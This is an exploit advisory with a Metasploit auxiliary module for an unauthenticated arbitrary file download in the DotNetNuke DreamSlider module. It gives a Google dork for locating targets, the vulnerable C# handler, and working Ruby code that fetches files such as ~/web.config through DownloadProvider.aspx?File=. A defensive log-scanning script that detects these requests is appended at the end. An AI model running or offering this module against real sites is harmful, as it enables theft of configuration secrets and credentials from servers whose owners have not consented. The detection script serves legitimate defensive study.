# Exploit Title: DotNetNuke DreamSlider Arbitrary File Download
# Date: 23/01/2014
# Author: Glafkos Charalambous
# Version: 01.01.02
# Vendor: DreamSlider
# Vendor URL: http://www.dreamslider.com/
# Google Dork: inurl:/DesktopModules/DreamSlider/
# CVE:
#
# Description
# DotNetNuke DreamSlider Module prior to version X suffers from a remote unauthenticated arbitrary file download vulnerability
#
# Vulnerable Code
#
# namespace DotNetNuke.Modules.DreamSlider
# {
#     using System;
#     using System.IO;
#     using System.Web.SessionState;
#     using System.Web.UI;
#
#     public class DownloadProvider : Page, IRequiresSessionState
#     {
#         protected void Page_Load(object sender, EventArgs e)
#         {
#             if (!base.IsPostBack && (base.Request.QueryString["File"] != null))
#             {
#                 string path = base.Request.QueryString["File"];
#                 string fileName = Path.GetFileName(path);
#                 base.Response.ContentType = "application/octet-stream";
#                 base.Response.AddHeader("Content-Disposition", "attachment; filename=" + fileName);
#                 base.Response.WriteFile(path);
#                 base.Response.End();
#             }
#         }
#     }
# }

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary
  Rank = ExcellentRanking

  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name' => 'DotNetNuke DreamSlider Arbitrary File Download',
      'Description' => %q{
        This module exploits an unauthenticated arbitrary file download vulnerability in DNN
        DreamSlider version 01.01.02 and below.
      },
      'Author' =>
        [
          'Glafkos Charalambous', # Discovery and Metasploit module
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'URL', 'http://metasploit.com' ]
        ],
      'DisclosureDate' => 'Mar 23 2015'))

    register_options(
      [
        Opt::RPORT(80),
        OptString.new('FILENAME', [true, 'File to download', '~/web.config']),
        OptString.new('PATH', [true, 'Path of DNN Nuke', '/']),
      ], self.class)
  end

  def check
    begin
      res = send_request_cgi({
        'method' => 'GET',
        'uri' => normalize_uri(datastore['PATH'],"/DesktopModules/DreamSlider/DownloadProvider.aspx"),
        'cookie' => datastore['Cookie'],
      })
      if res && res.code == 200 and res.body.to_s =~ /Download Provider/
        return Exploit::CheckCode::Vulnerable
      else
        return Exploit::CheckCode::Safe
      end
      Exploit::CheckCode::Safe
    end
  end

  def run
    begin
      print_status("#{peer} - Downloading file #{datastore['FILENAME']}")
      res = send_request_cgi({
        'method' => 'GET',
        'uri' => normalize_uri(datastore['PATH'],"/DesktopModules/DreamSlider/DownloadProvider.aspx?File=") + datastore['FILENAME'],
        'cookie' => datastore['Cookie'],
      })
    rescue Rex::ConnectionError
      print_error("#{peer} - Could not connect.")
      return
    end

    if res && res.code == 200
      if res.body.to_s.bytesize == 0
        print_error("#{peer} - 0 bytes returned, file does not exist or it is empty.")
        return
      end

      fileName = datastore['FILENAME']
      path = store_loot(
        'ds.http',
        'application/octet-stream',
        datastore['RHOST'],
        res.body,
        fileName
      )
      print_good("#{peer} - File saved in: #{path}")
    else
      print_error("#{peer} - Failed to download file.")
    end
  end
end
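
Added example (not part of the original advisory or module): a Ruby scan of IIS W3C access logs for requests that pass a `File` value to the `DownloadProvider.aspx` endpoint shown above, flagging each hit as served when the logged status is 200. The log lines, their field layout and the helper name `dreamslider_downloads` are constructed for illustration.

```ruby
require 'uri'

# Endpoint path as it appears in the module above, lowercased for comparison.
ENDPOINT = '/desktopmodules/dreamslider/downloadprovider.aspx'

# Constructed IIS W3C log sample (assumed field layout, documentation IP ranges).
SAMPLE_LOG = <<~LOG
  #Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status sc-bytes
  2015-03-24 10:01:12 GET /Default.aspx - 198.51.100.7 200 18233
  2015-03-24 10:02:40 GET /DesktopModules/DreamSlider/DownloadProvider.aspx File=~/web.config 203.0.113.9 200 4117
  2015-03-24 10:02:44 GET /dnn/DesktopModules/DreamSlider/DownloadProvider.aspx file=%7E%2Fweb.config 203.0.113.9 200 4117
  2015-03-24 10:03:02 GET /DesktopModules/DreamSlider/DownloadProvider.aspx - 203.0.113.9 200 512
  2015-03-24 10:05:30 GET /DesktopModules/DreamSlider/DownloadProvider.aspx File=~/missing.txt 203.0.113.9 404 1245
LOG

# Hypothetical helper: returns one hash per request that passed a File value
# to the DreamSlider download endpoint.
def dreamslider_downloads(log_text)
  fields = []
  hits = []
  log_text.each_line do |line|
    line = line.strip
    if line.start_with?('#Fields:')
      # W3C logs declare their own column order; honour it instead of guessing.
      fields = line.sub('#Fields:', '').split
      next
    end
    next if line.empty? || line.start_with?('#') || fields.empty?

    rec = fields.zip(line.split).to_h
    # end_with? also matches DNN installed under a sub-path (the PATH option).
    next unless rec['cs-uri-stem'].to_s.downcase.end_with?(ENDPOINT)

    query = rec['cs-uri-query'].to_s
    pairs = begin
      URI.decode_www_form(query)
    rescue ArgumentError
      query.split('&').map { |p| p.split('=', 2) } # keep undecodable queries raw
    end
    # ASP.NET query-string keys are case-insensitive.
    _, file = pairs.find { |k, _| k.to_s.casecmp?('file') }
    next unless file

    hits << { ip: rec['c-ip'], file: file,
              served: rec['sc-status'] == '200', bytes: rec['sc-bytes'].to_i }
  end
  hits
end
```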